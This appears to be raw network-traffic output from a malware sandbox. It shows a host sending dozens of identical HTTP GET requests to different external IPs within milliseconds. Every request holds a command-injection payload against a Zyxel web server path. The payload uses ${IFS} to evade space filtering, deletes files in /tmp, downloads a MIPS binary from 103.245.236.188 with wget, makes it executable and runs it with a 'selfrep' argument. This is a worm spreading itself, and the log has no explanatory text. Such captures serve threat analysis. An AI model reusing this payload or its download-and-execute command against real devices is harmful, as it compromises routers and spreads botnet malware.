                                                Jan 12, 2024 18:16:31.644270897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6458192.168.2.233312473.200.166.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644332886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6459192.168.2.235541688.232.60.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644356966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6460192.168.2.233578813.67.236.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644397020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6461192.168.2.2344282138.29.84.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644433022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6462192.168.2.235478449.25.33.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644483089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6463192.168.2.2334302125.253.137.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644525051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6464192.168.2.234397059.92.209.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644553900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6465192.168.2.234504846.165.96.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644596100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6466192.168.2.235172825.249.34.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644617081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6467192.168.2.23585162.250.199.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644680023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6468192.168.2.235036471.120.217.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644704103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6469192.168.2.2340510131.160.102.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644757986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6470192.168.2.23523064.7.67.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644790888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6471192.168.2.2332890158.217.100.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644848108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6472192.168.2.2333620163.104.172.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644879103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6473192.168.2.2335202188.239.216.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644944906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6474192.168.2.2358198139.84.172.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.644980907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6475192.168.2.2344886211.246.39.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645009041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6476192.168.2.2337598101.31.71.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645056963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6477192.168.2.235794880.22.108.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645107985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6478192.168.2.234435454.96.76.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645136118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6479192.168.2.2341354101.14.210.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645174026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6480192.168.2.2360546178.32.74.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645215988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6481192.168.2.235112239.157.106.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645246029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6482192.168.2.2333072185.128.19.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645270109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6483192.168.2.2346230118.67.255.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645315886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6484192.168.2.233791295.15.175.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645342112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6485192.168.2.2333312204.22.248.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645368099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6486192.168.2.235463458.160.85.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645414114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6487192.168.2.235316037.139.191.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645467043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6488192.168.2.2356296101.135.102.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645493031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6489192.168.2.2346396145.21.156.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645550966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6490192.168.2.23419129.207.62.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645579100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6491192.168.2.234380014.86.232.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645618916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6492192.168.2.2354346193.74.143.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645673037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6493192.168.2.2343168204.242.1.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645699978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6494192.168.2.2351356152.204.161.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645756006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6495192.168.2.2354750113.62.212.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645787954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6496192.168.2.233421899.214.209.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645816088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6497192.168.2.234066849.13.239.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645850897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6498192.168.2.2354650185.226.118.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645905972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6499192.168.2.234810283.127.112.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645915031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6500192.168.2.235670057.227.132.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645935059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6501192.168.2.2358580160.27.160.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.645992041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6502192.168.2.2346822126.78.9.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646038055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6503192.168.2.23577344.225.46.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646068096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6504192.168.2.2351880149.201.46.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646104097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6505192.168.2.235903680.121.76.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646146059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6506192.168.2.2344704159.87.193.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646203041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6507192.168.2.2349504110.160.105.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646236897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6508192.168.2.2345642200.167.87.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646292925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6509192.168.2.2347672138.169.6.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646337032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6510192.168.2.234238432.215.185.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646359921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6511192.168.2.2349658160.115.12.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646418095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6512192.168.2.233420685.216.141.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646446943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6513192.168.2.234398266.224.54.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646478891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6514192.168.2.235193679.217.217.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646534920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6515192.168.2.2360438174.134.143.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646572113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6516192.168.2.234922067.154.46.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646621943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6517192.168.2.2345910195.129.95.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646663904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6518192.168.2.2350968152.121.17.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646689892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6519192.168.2.2358948222.93.205.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.646737099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6520192.168.2.2351802105.130.200.37443
                                                TimestampBytes transferredDirectionData
